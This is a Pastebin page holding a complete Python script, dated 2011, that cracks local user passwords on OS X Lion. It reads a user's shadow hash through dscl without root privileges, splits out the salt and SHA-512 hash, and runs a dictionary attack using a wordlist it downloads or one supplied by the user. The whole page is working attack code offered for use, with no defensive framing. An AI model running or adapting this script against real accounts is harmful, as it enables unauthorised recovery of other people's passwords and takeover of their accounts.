Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

OS X Lion Password Cracker

defenceindepth Sep 18th, 2011 28,178 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  24.  
  25. def check(password): # Hash password and compare
  26.                
  27.         if not password.startswith("#!"): # Ignore comments
  28.  
  29.                 guess = hashlib.sha512(salt_hex + password).hexdigest()
  30.                 print("Trying... " + password)
  31.        
  32.                 if guess == hash:
  33.                         print("Cleartext password for user '"+username+"' is : "+password)
  34.                         exit(0)
  35.  
  36. if len(sys.argv) < 2:
  37.         print("No username given. Defaulting to current user.")
  38.         defaultuser = True
  39. else:
  40.         username = sys.argv[1]
  41.  
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  44.  
  45. if defaultuser:
  46.         username = whoami.rstrip()
  47.  
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  50.  
  51. list = dscl_out.split("\n")
  52.  
  53. for pos,item in enumerate(list): # extract digest
  54.         if "dsAttrTypeNative:ShadowHashData" in item:
  55.                 digest = list[pos+1].replace(" ", "")
  56.  
  57. if len(digest) == 262: # Out of box configuration      
  58.         salt = digest[56:64]   
  59.         hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61.         print("SMB is on")
  62.         salt = digest[104:112]
  63.         hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65.         salt = digest[176:184]
  66.         hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68.         salt = digest[224:232]
  69.         hash = digest[232:360]
  70.  
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  73.  
  74. salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  75.  
  76. if len(sys.argv) == 3: # If dictionary file specified
  77.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78.         check(whoami.rstrip())
  79.         passlist = open(sys.argv[2], "r")
  80.         password = passlist.readline()
  81.  
  82.         while password:
  83.                 check(password.rstrip())
  84.                 password = passlist.readline()
  85.         passlist.close()
  86.  
  87. else: # No dictionary file specified
  88.         print("No dictionary file specified. Defaulting to hard coded link.")
  89.        
  90.         passlist = urllib2.urlopen(link) # Download dictionary file
  91.         passwords = passlist.read().split("\n")
  92.         print("\nPassword list successfully read")
  93.        
  94.         passwords.append(whoami.rstrip())      
  95.        
  96.         print("\nCracking...")
  97.         for password in passwords:
  98.                 check(password)
  99.  
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  105.  
  106. print("\nPassword not found. Try another dictionary.\n")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top